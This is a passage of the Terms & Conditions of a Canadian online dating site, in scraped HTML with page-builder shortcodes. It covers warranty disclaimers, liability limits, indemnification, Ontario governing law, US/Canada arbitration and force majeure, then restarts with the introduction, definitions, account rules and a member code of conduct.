and future intellectual property rights in Ideas, to the Company. You must do all things reasonably requested by the Company to assure further the assignment of such rights. You understand and acknowledge that the Company has both internal resources and other external resources which may have developed or may in the future develop ideas identical to or similar to Ideas and that the Company is only willing to consider Ideas on these terms. In any event, Ideas are not submitted in confidence and the Company assumes no obligation, express or implied by considering it. Without limitation, the Company will exclusively own all now known or hereafter existing rights to the Ideas of every kind and nature throughout the world and shall be entitled to unrestricted use of the Ideas for any purpose whatsoever, commercial or otherwise without compensation to the provider of the Ideas.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »21. DISCLAIMER OF WARRANTIES » tab_id= »1596408416814-e5165796-0516″][vc_column_text]</p> <p style="text-align: left;">21.1      You understand and agree that your use of the Apps, the Websites and/or the Services is at your sole risk.</p> <p style="text-align: left;">21.2       The Apps, the Websites and the Services are provided on an “as is” and “as available” basis without warranties or conditions of any kind, either express or implied (to the maximum extent permitted by applicable law).</p> <p style="text-align: left;">21.3      To the maximum extent permitted by applicable law, the Company expressly disclaims all warranties and conditions including, without limitation, warranties and conditions of satisfactory quality, merchantability, fitness for a particular purpose, non-infringement, and those arising from course of dealing or usage of trade.</p> <p style="text-align: left;">21.4      The Company makes no warranty as to the accuracy, completeness or reliability of any materials, information or data available through, or the performance of, the Apps, the Websites and/or the Services.</p> <p style="text-align: left;">21.5      The Company does not represent or warrant that:</p> <p style="text-align: left;">21.5.1      you will be able to access or use the Apps, the Websites and/or the Services at the times or locations of your choosing;</p> <p style="text-align: left;">21.5.2      that operation of the Apps, the Websites and/or the Services will be uninterrupted, timely, error-free;</p> <p style="text-align: left;">21.5.3      your use of the Apps, the Websites and/or the Services will meet your requirements;</p> <p style="text-align: left;">21.5.4      defects in the operation of the Apps, the Websites and/or the Services will be corrected; or</p> <p style="text-align: left;">21.5.5      the Apps, the Websites and/or the Services is free of viruses or other harmful components.</p> <p style="text-align: left;">21.6      You acknowledge and agree that any material downloaded or otherwise obtained through the use of the Apps, the Websites and/or the Services is at your own risk and that you will be solely responsible for any damage to your computer, mobile phone or other device or any loss of data resulting from downloading or obtaining such material.</p> <p style="text-align: left;">21.7      Some jurisdictions do not allow the disclaimer of implied warranties.  In such jurisdictions, the Company expressly disclaims all warranties and conditions to the maximum extent permitted by applicable law.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »22. LIMITATION OF LIABILITY » tab_id= »1596408443043-8880cd5c-23db »][vc_column_text]</p> <p style="text-align: left;">22.1      <strong>TO THE MAXIMUM EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL </strong>, <strong>THE COMPANY, ITS SUBSIDIARIES OR HOLDING COMPANY, ANY SUBSIDIARY OF ANY SUCH HOLDING COMPANY, AFFILIATES, SUCCESSORS, ASSIGNS, AND THEIR RESPECTIVE EMPLOYEES, AGENTS, DIRECTORS, OFFICERS AND SHAREHOLDERS, WHETHER INDIVIDUALLY OR COLLECTIVELY (THE “RELATED PARTIES”), BE LIABLE TO YOU OR TO ANY OTHER PERSON FOR ANY INCIDENTAL, CONSEQUENTIAL, OR INDIRECT DAMAGES (INCLUDING, BUT NOT LIMITED TO, DAMAGES FOR LOSS OF DATA, LOSS OF PROGRAMS, COST OF PROCUREMENT OF SUBSTITUTE SERVICES OR SERVICE INTERRUPTIONS) ARISING OUT OF THE USE OF OR INABILITY TO USE THE SERVICES, EVEN IF WE OR OUR AGENTS OR REPRESENTATIVES KNOW OR HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.</strong></p> <p style="text-align: left;">22.2      <strong>WE DO NOT CONDUCT BACKGROUND CHECKS ON MEMBERS REGISTERING FOR THE SERVICES IN ANY WAY. ANY ATTEMPT BY US TO SCREEN MEMBERS IS NOT A GUARANTEE OF SAFETY ON THE WEBSITE. YOU ARE RESPONSIBLE FOR YOUR OWN SAFETY ON THE WEBSITE AND WHEN MEETING OTHER MEMBERS IN PERSON.</strong></p> <p style="text-align: left;">22.3      <strong>THE RELATED PARTIES WILL NOT BE LIABLE FOR ANY DAMAGES, DIRECT, INDIRECT, INCIDENTAL AND/OR CONSEQUENTIAL ARISING OUT OF THE USE OF THE SERVICES, INCLUDING, WITHOUT LIMITATION, DAMAGES ARISING OUT OF YOUR COMMUNICATIONS WITH AND/OR INTERACTIONS WITH ANY OTHER MEMBER OF THE SERVICES, OR ANY INDIVIDUAL YOU MEET VIA THE SERVICES.</strong></p> <p style="text-align: left;">22.4      <strong>NOTWITHSTANDING ANYTHING TO THE CONTRARY CONTAINED HEREIN, OR TO THE EXTENT APPLICABLE LAW DOES NOT PERMIT THE LIMITATIONS IN THIS CLAUSE, THE RELATED PARTIES’ LIABILITY TO YOU FOR ANY CAUSE WHATSOEVER WILL AT ALL TIMES BE LIMITED TO THE AMOUNT PAID, IF ANY, BY YOU TO US FOR THE SERVICES DURING THE TERM OF YOUR MEMBERSHIP OR SUBSCRIPTION TO THE MAXIMUM EXTENT PERMITTED BY LAW.</strong></p> <p style="text-align: left;">22.5      <strong>IN ALL CASES, THE RELATED PARTIES WILL NOT BE LIABLE TO YOU FOR ANY LOSS OR DAMAGE THAT IS NOT REASONABLY FORESEEABLE.</strong></p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »23. INDEMNIFICATION » tab_id= »1596408462486-d9c1b7f0-10b1″][vc_column_text]</p> <p style="text-align: left;">23.1      You agree to, and you hereby, defend, indemnify, and hold the Related Parties harmless from and against any and all claims, damages, losses, costs, investigations, liabilities, judgments, fines, penalties, settlements, interest, and expenses (including attorneys’ fees) that directly or indirectly arise from or are related to any claim, suit, action, demand, or proceeding made or brought against any Related Party, or on account of the investigation, defense, or settlement thereof, arising out of or in connection with, whether occurring heretofore or hereafter:</p> <p style="text-align: left;">23.1.1      any of your data posted or otherwise provided on the Services;</p> <p style="text-align: left;">23.1.2      your Material;</p> <p style="text-align: left;">23.1.3      your use of the Services and your activities in connection with the Services, including your communications and meetings with Members you meet through the Services;</p> <p style="text-align: left;">23.1.4      your breach or alleged breach of this Agreement or any additional terms;</p> <p style="text-align: left;">23.1.5      your violation or alleged violation of any laws, rules, regulations, codes, statutes, ordinances, or orders of any governmental or quasi-governmental authorities in connection with your use of the Services or your activities in connection with the Services;</p> <p style="text-align: left;">23.1.6      information or material transmitted through your computer or other devices, even if not submitted by you, that infringes, violates, or misappropriates any copyright, trademark, trade secret, trade dress, patent, publicity, privacy, or other right of any person or entity;</p> <p style="text-align: left;">23.1.7      any misrepresentation made by you; and</p> <p style="text-align: left;">23.1.8      the Related Parties’ use of the information that you submit to us (including your Material)</p> <p style="text-align: left;">(all of the foregoing, “<strong>Claims and Losses</strong>”).</p> <p style="text-align: left;">You will cooperate as fully required by Related Parties in the defense of any Claims and Losses. Notwithstanding the foregoing, Related Parties retain the exclusive right to settle, compromise, and pay any and all Claims and Losses. Related Parties reserve the right to assume the exclusive defense and control of any Claims and Losses. You will not settle any Claims and Losses without, in each instance, the prior written consent of an officer of a Related Party.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »24. GOVERNING LAW; JURISDICTION » tab_id= »1596408483902-eeb6aafd-fe7a »][vc_column_text]</p> <p style="text-align: left;">24.1      The laws applicable to the interpretation of these Terms & Conditions shall be the laws of the Province of Ontario and the federal laws applicable therein, excluding the UN Convention on Contracts for the International Sale of Goods (CISG) and excluding principles of conflict of laws.  Except as provided in Section 25 below, you irrevocably submit to the personal and exclusive jurisdiction of the state and federal courts located in Ontario for all disputes arising out of or related to your use of any of the Services.</p> <p style="text-align: left;">24.2      The governing law does not impact your rights as a consumer according to the consumer protection laws and regulations of your country of residence.</p> <p style="text-align: left;">24.3      You acknowledge and agree that the Company would be irreparably damaged if the terms of these Terms & Conditions were not specifically enforced, and therefore you agree that we shall be entitled, without bond, other security, or proof of damages, to appropriate equitable remedies with respect to breaches of these Terms & Conditions, in addition to such other remedies as we may otherwise have available to us under applicable laws.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »25. DISPUTE RESOLUTION; ARBITRATION –WITHIN THE UNITED STATES AND CANADA » tab_id= »1596408503327-6dd42d3a-5825″][vc_column_text]</p> <p style="text-align: left;"><strong><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">IF YOU RESIDE IN THE UNITED STATES OR CANADA (OR YOU BRING A CLAIM AGAINST THE COMPANY IN THE UNITED STATES OR CANADA), YOU ARE SUBJECT TO THE FOLLOWING SECTION.  PLEASE READ THIS SECTION CAREFULLY.</ins></strong></p> <p style="text-align: left;">25.1         This provision shall apply to the resolution of any dispute arising out of or in any way related to the Services, this Agreement (and any amendments or addenda thereto), and the subject matter hereof, including without limitation any contract, tort, statutory or equity claims between you and us or our officers, directors, employees, agents, subsidiaries, or joint ventures (the “<strong>Dispute</strong>”); provided, however, that any claims specifically described in subparagraph (b) below will not be included in the definition of Dispute. You may also assert claims in small claims court if your claims qualify. In the event of any Dispute, the parties are encouraged to attempt to resolve the Dispute by informal means. If the parties are not able to do so, the Dispute will be resolved only by binding arbitration.</p> <p style="text-align: left;">25.2         Arbitration is the referral of a dispute to one or more impartial persons for a final and binding determination. Any Dispute shall be subject only to binding arbitration. The parties expressly agree that there shall be no jury trial or right to a jury trial, or right to any other proceeding to resolve any Dispute in any court. In the event of any Dispute, both parties agree that the arbitration provision in this Agreement will be governed, both procedurally and substantively, by the Federal Arbitration Act, 9 U.S.C. sections 1-9 (“<strong>FAA</strong>”) to the maximum extent permitted by applicable law.</p> <p style="text-align: left;">25.3         All aspects of the arbitration proceeding, and any ruling, decision or award by the arbitrator, will be strictly confidential for the benefit of all parties, and any party shall have the right to prevent any actual or threatened breach of this confidentiality provision by temporary, preliminary or permanent injunctive, or declaratory relief in an appropriate court of law. This provision shall not prevent either party from filing a petition in court to confirm an arbitration award.</p> <p style="text-align: left;">25.4         The parties expressly agree that any Dispute is personal to them, and any Dispute shall only be resolved by an individual arbitration. Neither party agrees to class arbitration, or an arbitration where a person brings a Dispute as a representative of any other person or persons. Neither party agrees that a Dispute can be brought as a class or representative action outside of arbitration, or on behalf of any other person or persons. The parties agree that that a Dispute may only be resolved through an individual arbitration and shall not be brought as a class arbitration, a class action, or any other representative proceeding. If your agreement to waive any right to a jury trial or to participate in a class action is found to be unenforceable, then the entirety of this arbitration section will be null and void and neither you nor we will be entitled to arbitrate our dispute.</p> <p style="text-align: left;">25.5         The arbitration of the Dispute will be administered by the American Arbitration Association (“<strong>AAA</strong>”) or, in the event the AAA declines or is unable to administer the arbitration, by an arbitration forum or arbitrator that you and we mutually agree upon. If, after making a reasonable effort, you and we are unable to agree upon an arbitration forum or arbitrator, the AAA or a court having proper jurisdiction will appoint an arbitration forum or arbitrator. The arbitration will be conducted in accordance with the AAA’s Commercial Arbitration Rules (“<strong>Commercial Rules</strong>”) and, when deemed appropriate by the arbitration forum or arbitrator, the AAA’s Supplementary Procedures for Consumer-Related Disputes (“<strong>Consumer Procedures</strong>”), or the appropriate rules of any alternative arbitration forum selected by you and us or appointed by a court, subject to the following modifications:</p> <p style="text-align: left;">25.5.1         The arbitration will be conducted before a single arbitrator who will be a licensed attorney or a former judge and will have at least five (5) years of legal experience in the resolution of commercial disputes.</p> <p style="text-align: left;">25.5.2         As limited by the FAA, the terms of this Agreement, and the applicable AAA rules, the arbitrator will have the exclusive power and jurisdiction to make all procedural and substantive decisions concerning the Dispute. This does not include the power to conduct a class arbitration or a representative action, which is prohibited by the terms of this Agreement as stated above. The arbitrator may only conduct an individual arbitration, and may not consolidate more than one person’s claims and may not preside over any form of representative or class proceeding, or any proceeding on behalf of or involving more than one person or persons.</p> <p style="text-align: left;">25.5.3        The parties may take discovery through interrogatories, depositions and requests for production that the arbitrator determines to be necessary and appropriate.</p> <p style="text-align: left;">25.5.4         The prevailing party in any of the following matters (without regard to the Limitation of Liability provisions) shall be entitled to recover its reasonable attorneys’ fees and costs incurred in any of the following circumstances:</p> <p style="text-align: left;">(a)              a motion which any party is required to make in any court to compel arbitration of a Dispute;</p> <p style="text-align: left;">(b)             any appeal of an arbitration award, whether to the arbitrator or the courts, for the purpose of vacating or modifying the award; or</p> <p style="text-align: left;">(c)              any action to enforce the confidentiality provisions stated herein we will pay the amount of any arbitration costs and fees charged by the AAA for claims totaling less than $10,000 unless the arbitrator determines the claims are frivolous. In no event will we pay for your attorneys’ fees unless required by law.</p> <p style="text-align: left;">25.5.5         To begin an arbitration proceeding, you must send a letter requesting arbitration and describing your claim to:</p> <p style="text-align: left;"><strong>Global Fusion Media</strong><br /> subsidiary Company<br /> <strong>Ads Go</strong><br /> CP 21523 BP Ste-Famille, Sherbrooke QC J1G 5K2<br /> Canada<br /> Email: <a href="mailto:dataprotection@canada-singles.ca">dataprotection@canada-singles.ca</a></p> <p style="text-align: left;">25.5.6         You may choose to have the arbitration conducted by telephone, based on written submissions, or in person in the county where you live or at another mutually agreed location. The AAA Commercial Rules and Consumer Procedures, the forms you may need to begin the arbitration proceeding, and other information about the AAA, are available from the AAA, which can be contacted by mail at 1633 Broadway, Floor 10, New York, New York 10019, by telephone at (800) 778-7879, or through its website at www.adr.org.</p> <p style="text-align: left;">25.6         This Agreement does not require you or us to submit to arbitration any Dispute involving our intellectual property rights in and to the websites or the Service, including, without limitation:</p> <p style="text-align: left;">25.6.1         claims of infringement or misappropriation of any United States or foreign copyright, patent, trade secret, trademark, service mark or trade dress;</p> <p style="text-align: left;">25.6.2         claims alleging violations of Title 17 of the United States Code, Sections 1201 and/or 1202, or of any similar foreign law; or</p> <p style="text-align: left;">25.6.3         in any matter that involves any of the foregoing claims, for resolution or decision of any question of fact or law required to resolve such claim, including, but not limited to, questions required to decide or rule with respect to the infringement, misappropriation, validity, enforceability or ownership of any copyright, patent, trade secret, trademark, service mark or trade dress or with respect to any remedy or relief at law or in equity for any such infringement or misappropriation or for any violation of such Sections 1201 and/or 1202.</p> <p style="text-align: left;">25.7         You and we acknowledge and agree that any violation of this Section 25 of this Agreement may cause the parties irreparable harm, and therefore you and we agree that the parties will be entitled to seek extraordinary relief in court, including but not limited to temporary restraining orders, preliminary injunctions and permanent injunctions without the necessity of posting a bond or other security, in addition to and without prejudice to any other rights or remedies that the parties may have for a breach of this Section 25 of this Agreement.</p> <p style="text-align: left;">25.8         With the exception of your agreement to waive any right to a jury trial or to participate in a class action, if any other provision in this Section 25 is held to be illegal, invalid or unenforceable, such provision shall be fully severable, this Section 25 shall be construed and enforced as if such illegal, invalid or unenforceable provision had never comprised a part of this section, and the remaining provisions of this section shall remain in full force and effect. Furthermore, in lieu of such illegal, invalid or unenforceable provision, there shall be added automatically as part of this Section 25 legal, valid and enforceable provision as similar as possible to the former provision.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »26. LIMITATION OF TIME PERIOD TO COMMENCE ANY DISPUTE » tab_id= »1596408528790-6b6db4ee-53e8″][vc_column_text]</p> <p style="text-align: left;">26.1         Regardless of any statute of limitations or law to the contrary, and to maximum extent permitted by applicable law, any Dispute arising out of or related to the Services or this Agreement must be filed within six (6) months after the date in which the incident giving rise to the Dispute occurred; provided that, if the substantive law applicable to the arbitration prohibits the parties from agreeing to this limitations period, then the limitations period under the applicable substantive law shall control. The failure of a party to file an arbitration claim within the applicable limitations period shall constitute a waiver by that party of its right to bring such a claim relating to any Dispute in any form, and a complete bar to any claim based on any Dispute, and the arbitrator shall not have jurisdiction to make a determination for a party that has not brought its Dispute for determination within the applicable limitations period.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »27. GENERAL » tab_id= »1596408549518-37b30e57-23c4″][vc_column_text]</p> <p style="text-align: left;">27.1         These Terms & Conditions and the Privacy Policy contain the entire Agreement between you and the Company. If any provision of this Agreement is held by any competent court or authority to be invalid or unenforceable in whole or in part, the validity of the other provisions of this Agreement and the remainder of the affected provision shall be unaffected and shall remain in full force and effect.</p> <p style="text-align: left;">27.2         The Agreement is not intended to create a partnership, joint venture or relationship of principal and agent between the parties.</p> <p style="text-align: left;">27.3         No waiver by the Company of any breach of this Agreement shall be considered as a waiver of any subsequent breach of the same provision or any other provision.</p> <p style="text-align: left;">27.4         The Company may assign its rights under these Terms & Conditions to any person or entity without your consent. The rights granted to you under these Terms & Conditions may not be assigned without the Company’s prior written consent, and any attempted unauthorized assignment by you shall be null and void.</p> <p style="text-align: left;">27.5         Clauses 20 to 27 inclusive will survive termination or expiration of this Agreement.</p> <p style="text-align: left;">27.6         <strong>Force Majeure</strong></p> <p style="text-align: left;">27.6.1         For the purposes of this clause 27.6, “<strong>Force Majeure Event</strong>” means any act or event beyond the reasonable control of the Company, including without limitation strikes, lock-outs or other industrial action by third parties, civil commotion, riot, invasion, terrorist attack or threat of terrorist attack, war (whether declared or not) or threat or preparation for war, fire, explosion, storm, flood, earthquake, subsidence, epidemic or other natural disaster, or failure of public or private telecommunications networks.</p> <p style="text-align: left;">27.6.2         The Company will not be liable for any failure to perform or any delay in performance of, any of its obligations under these Terms & Conditions caused by a Force Majeure Event.</p> <p style="text-align: left;">27.6.3         In the event of a Force Majeure Event that results in Services being unable to be provided for 14 days or more, either party may terminate this Agreement with immediate effect upon written notice to the other and neither party will have the right to claim compensation from the other.</p> <p>[/vc_column_text][/vc_tta_section][/vc_tta_accordion][/vc_column][/vc_row][:fr][vc_row][vc_column][vc_column_text]</p> <h2>Terms & Conditions – Please carefully read</h2> <p><img fetchpriority="high" decoding="async" class="alignleft wp-image-940 size-medium" title="Terms & Conditions Canada Singles Dating Canada Singles Dating The best singles dating site in Canada - join one of the best online dating sites for professional singles. Meet smart, and Safely and Single men and women from your country and your part of Canada!" src="https://canada-singles.ca/wp-content/uploads/terms-and-conditions-canada-singles-dating-1-300x200.jpg" alt="Terms & Conditions Canada Singles Dating Canada Singles Dating The best singles dating site in Canada - join one of the best online dating sites for professional singles. Meet smart, and Safely and Single men and women from your country and your part of Canada!" width="300" height="200" srcset="https://canada-singles.ca/wp-content/uploads/terms-and-conditions-canada-singles-dating-1-300x200.jpg 300w, https://canada-singles.ca/wp-content/uploads/terms-and-conditions-canada-singles-dating-1.jpg 360w" sizes="(max-width: 300px) 100vw, 300px" />For information on how to use the service or for a simple cancellation of your membership, please see <span style="color: #ff0000;"><a style="color: #ff0000;" href="/service-clientele/" target="_blank" rel="noopener noreferrer">our help section</a>.</span> If you have any questions, please contact our <span style="color: #ff0000;"><a style="color: #ff0000;" href="/service-clientele/" target="_blank" rel="noopener noreferrer">customer care team</a>.</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_tta_accordion shape= »square » color= »peacoc » spacing= »5″ gap= »5″ c_icon= »triangle » active_section= »50″][vc_tta_section title= »1. INTRODUCTION » tab_id= »1596407867806-f677e1bd-fef1″][vc_column_text]</p> <p style="text-align: left;">1.1         These Terms & Conditions are between Global Fusion Media (the “<strong>Company</strong>”, “<strong>we</strong>,” “<strong>us</strong>,” or “<strong>our</strong>”) and you (“<strong>you</strong>,” “<strong>your</strong>,” or “<strong>yourself</strong>”).  All references to the Company, where relevant, also refer to the Company under its former corporate name <strong>Global Fusion Media</strong>.</p> <p style="text-align: left;">1.2         We are proud to provide online personals services for single adults to meet each other.</p> <p style="text-align: left;">1.3         These Terms & Conditions, combined with our Privacy Policy, form a legally binding Agreement between you and us (“<strong>Agreement</strong>”).</p> <p style="text-align: left;">1.4         We are responsible for the content of this website.  Our details are:</p> <p style="text-align: left;">Canada Singles Customer Care –<br /> <strong>Global Fusion Media</strong><br /> subsidiary Company<br /> <strong>Ads Go</strong><br /> CP 21523 BP Ste-Famille, Sherbrooke QC J1G 5K2<br /> Canada<br /> Email: <a href="mailto:support@canada-singles.ca">support@canada-singles.ca</a></p> <p style="text-align: left;">1.5         The Agreement, as it may be amended from time to time, applies to all users of any our Services.</p> <p style="text-align: left;">1.6         If you become a Member, you will be able to access the Services associated with the Company product(s) for which you hold a Membership.  If you meet certain requirements, the Company may in its discretion make your profile visible to Users of other Websites and Apps operated by the Company for which you do not have a Membership.</p> <p style="text-align: left;">1.7         The Agreement also applies to you use of all features, widgets, plug-ins, applications, content, downloads and/or other services that:</p> <p style="text-align: left;">1.7.1         we own and control and make available to you; or</p> <p style="text-align: left;">1.7.2         also post a link to this Agreement.</p> <p style="text-align: left;">1.8         You are reminded to abide by all applicable laws.  You also undertake not to use our Services for unlawful, harmful, threatening, abusive, harassing, tortious, defamatory, vulgar, obscene, libellous, hateful, or racially or ethnically offensive purposes (or for purposes which are otherwise objectionable).</p> <p style="text-align: left;">1.9         If you violate these Terms & Conditions, we may terminate your access to our Services.</p> <p style="text-align: left;"><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">THESE TERMS & CONDITIONS CONTAIN IMPORTANT INFORMATION REGARDING YOUR LEGAL RIGHTS, REMEDIES AND OBLIGATIONS. THESE INCLUDE VARIOUS LIMITATIONS AND EXCLUSIONS.</ins></p> <p style="text-align: left;"><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">THE LAW WHICH GOVERNS THESE TERMS & CONDITIONS DEPENDS ON WHERE YOU RESIDE.  PLEASE READ SECTION </ins><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">24</ins><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">. </ins></p> <p style="text-align: left;"><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">IF YOU RESIDE IN THE UNITED STATES OR CANADA, OR YOU BRING ANY CLAIM AGAINST THE COMPANY IN THE UNITED STATES OR CANADA:</ins></p> <p style="text-align: left;">·        <ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">YOU AGREE THAT DISPUTES WILL BE RESOLVED BY BINDING ARBITRATION;</ins></p> <p style="text-align: left;">·        <ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">YOU WAIVE ANY RIGHT TO PARTICIPATE IN A CLASS-ACTION LAWSUIT;</ins></p> <p style="text-align: left;">·        <ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">YOU WAIVE ANY RIGHT TO A CLASS-WIDE ARBITRATION; AND</ins></p> <p style="text-align: left;">·        <ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">YOU WAIVE ANY RIGHT TO PARTICIPATE IN A JURY TRIAL.</ins></p> <p style="text-align: left;"><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">PLEASE READ SECTION </ins><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">25</ins><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">.  </ins></p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »2. DEFINITIONS » tab_id= »1596407867806-204d70a2-6893″][vc_column_text]2.1         In these Terms & Conditions:</p> <p>2.2          “<strong>Apps</strong>” refers, individually and collectively, to each and all of the Mobile Apps, Desktop Apps, and Web Apps.</p> <p>2.3         “<strong>Desktop Apps</strong>” means the desktop applications published by the Company and which may be offered from time to time.</p> <p>2.4         “<strong>Member</strong>” means any person whose Membership to has been accepted by the Company and whose Membership remains valid for the time being.  The term ‘Member’ includes free Members and paying Members, as the context requires.</p> <p>2.5         “<strong>Membership</strong>” means your entitlement to one or more Services by virtue of being a Member.  Such entitlement may vary depending on whether the Membership is a paid Membership or a free Membership (and the relevant Company product for which you have a Membership).</p> <p>2.6         “<strong>Mobile</strong> <strong>Apps</strong>” means the iOS application and the Android application or any other mobile/tablet device software applications published by the Company and which may be offered from time to time.</p> <p>2.7         “<strong>Privacy Policy</strong>” means the privacy policy available at <a href="https://canada-singles.ca/privacy-policy/" target="_blank" rel="noopener noreferrer">https://canada-singles.ca/privacy-policy/</a>, which combined with the Terms & Conditions represent the Agreement between you and the Company.</p> <p>2.8         “<strong>Services</strong>” means any and all of the services provided by the Company by any means (including, but not limited to, the Websites, the Apps, or any other technology).</p> <p>2.9         “<strong>Terms & Conditions</strong>” means these terms and conditions which, together with the Privacy Policy, represent the Agreement between you and the Company, as varied and as amended by the Company at its full discretion at any time and published on the Websites.</p> <p>2.10      “<strong>User</strong>” means any Member and/or Visitor.</p> <p>2.11      “<strong>Visitor</strong>” means any person who browses the Services.</p> <p>2.12      “<strong>Web Apps</strong>” means the web applications published by the Company and which may be offered from time to time.</p> <p>2.13      “<strong>Website(s)</strong>” means, individually or collectively, the websites operated by the Company.</p> <p>2.14      As the context may require, words in the singular may be read as the plural and the plural as the singular.[/vc_column_text][/vc_tta_section][vc_tta_section title= »3. YOUR PRIVACY – COLLECTION AND RETENTION OF PERSONAL INFORMATION » tab_id= »1596407927489-04dd054b-03e1″][vc_column_text]</p> <p style="text-align: left;">3.1         We are bound by European privacy laws.  We explain what we do and don’t do with your data in our Privacy Policy at: https://canada-singles.ca/privacy-policy/</p> <p style="text-align: left;">3.2         We do not always encrypt your messages, and we reserve the right to monitor those messages and other content for compliance with our Terms & Conditions (for example, where the content of your messages is reported for breaching our Terms & Conditions).</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »4. ACCOUNTS AND SECURITY » tab_id= »1596407986758-ba404da7-0fc9″][vc_column_text]</p> <p style="text-align: left;">4.1         To access the Services, you must have an account.</p> <p style="text-align: left;">4.2         You must maintain, and are responsible for, the confidentiality of your logon and password.</p> <p style="text-align: left;">4.3         If requested, you must provide us with a form of identification to verify your identity.</p> <p style="text-align: left;">4.4         The Services are open to everyone – subject to approval of an application by the Company according to these Terms & Conditions.</p> <p style="text-align: left;">4.5         The Company requires all Users to undertake to abide by the Privacy Policy and these Terms & Conditions, including, in particular, by agreeing to the Code of Conduct at Section <strong>6</strong> below.</p> <p style="text-align: left;">4.6         You may not use our Services if:</p> <p style="text-align: left;">4.6.1         <strong>You are under the age of 18. </strong></p> <p style="text-align: left;">Children are not eligible to use our Services, and we ask that anyone under the age of 18 years old not submit any personal information to us.  Our Services are not directed at anyone under the age of 18 years old.  We also do not collect or maintain personally identifiable information from those Users who we know are under the age of 18 years old. Should we learn or be notified that we have collected information from Users under the age of 18 years old, we will immediately delete such personally identifiable information;</p> <p style="text-align: left;">4.6.2         <strong>You have ever been convicted of a violent or sexually related criminal offence.</strong></p> <p style="text-align: left;">We do not conduct criminal background screenings of our Users, nor are we able to personally identify each User. The Company cannot be held liable for false declarations made by a Member. It is thus important to take certain common-sense precautions when meeting with another Member.  For example, consider informing a close friend or relative of any meeting and plan your first meeting in a public place.</p> <p style="text-align: left;">4.6.3         <strong>You have previously been banned from using our Services or similar services</strong>.</p> <p style="text-align: left;">4.7         The Company cannot be held liable for actions of any nature committed by any User, including any such actions in the course of any events which are organised by the Company or by others using the Services.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »5. CONDITIONS OF ADMISSION » tab_id= »1596408002606-ea19932b-9164″][vc_column_text]</p> <p style="text-align: left;">5.1         You must agree to these Terms & Conditions in order to use our Services. They govern your use of our Services.</p> <p style="text-align: left;">5.2         If you do not accept the Privacy Policy and these Terms & Conditions, you are not entitled to access our Services.</p> <p style="text-align: left;">5.3         If you:</p> <p style="text-align: left;">5.3.1         use our Services;</p> <p style="text-align: left;">5.3.2         click to join and/or sign in; and/or</p> <p style="text-align: left;">5.3.3         check a box to indicate you agree to these Terms & Conditions,</p> <p style="text-align: left;">(as may be the case), we will take this as your acceptance of these Terms & Conditions and your agreement to their content.</p> <p style="text-align: left;">5.4         The Company reserves the right to offer admission to its Services in its full discretion.</p> <p style="text-align: left;">5.5         By using our Services, you represent and warrant that you have the legal capacity to enter a contract in the jurisdiction where you reside.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »6. CODE OF CONDUCT » tab_id= »1596408037223-13ae79f9-8c93″][vc_column_text]</p> <p style="text-align: left;">6.1         Each User undertakes to comply strictly with all applicable laws and regulations, as well as with these Terms & Conditions.</p> <p style="text-align: left;">6.2         Each User irrevocably undertakes to refrain from:</p> <p style="text-align: left;">6.2.1         Discrimination on the basis of a User’s real or supposed: age, race, color, ethnicity, national origin, sexual orientation, religion, gender identity, family situation, pregnancy, physical appearance, surname, state of health, disability, genetic characteristics, personal beliefs, political opinions or union activities;</p> <p style="text-align: left;">6.2.2         Using the Services for any professional or commercial purposes, whether directly or indirectly, including offering, soliciting or promoting chargeable goods or services or financial compensation.  Prostitution is formally prohibited on our Services;</p> <p style="text-align: left;">6.2.3         Engaging in any illegal activity whatsoever using our Services;</p> <p style="text-align: left;">6.2.4         Posting any content or making any statement in any form which:</p> <p style="text-align: left;">(a)              infringes, misappropriates or violates a third party’s patent, copyright, trademark, trade secret, moral rights or other intellectual property rights, or rights of publicity or privacy;</p> <p style="text-align: left;">(b)             violates, or encourages any conduct that would violate, any applicable law or regulation or would give rise to civil liability;</p> <p style="text-align: left;">(c)              is fraudulent, false, misleading (directly or by omission or failure to update information) or deceptive;</p> <p style="text-align: left;">(d)             is defamatory, obscene, pornographic, vulgar or offensive;</p> <p style="text-align: left;">(e)              promotes discrimination, bigotry, racism, hatred, harassment or harm against any individual or group;</p> <p style="text-align: left;">(f)              is violent or threatening or promotes violence or actions that are threatening to any other person;</p> <p style="text-align: left;">(g)              promotes illegal or harmful activities or substances;</p> <p style="text-align: left;">(h)             contains a link to any of content associated with the above prohibitions; and</p> <p style="text-align: left;">(i)               is otherwise contrary to applicable laws and regulations; and</p> <p style="text-align: left;">6.2.5         Disseminating any personal information of any other User, including any contact details or similar, without that User’s consent.</p> <p style="text-align: left;">6.3         Each User undertakes to report any abuses to the Company, as well as any improper comments or conduct by other Users.</p> <p style="text-align: left;">6.4         We conduct regular inspections of the use of our Services, including for safety and fraud protection purposes.  We reserve the right to remove all or part of any content created, used or circulated publically or privately by Users which is not compliant with applicable laws or regulations, or which violates these Terms & Conditions.</p> <p style="text-align: left;">6.5         We may contact any User to request that the User remedy any non-compliance with applicable laws or regulations, or these Terms & Conditions.</p> <p style="text-align: left;">6.6         We may exclude or remove any User 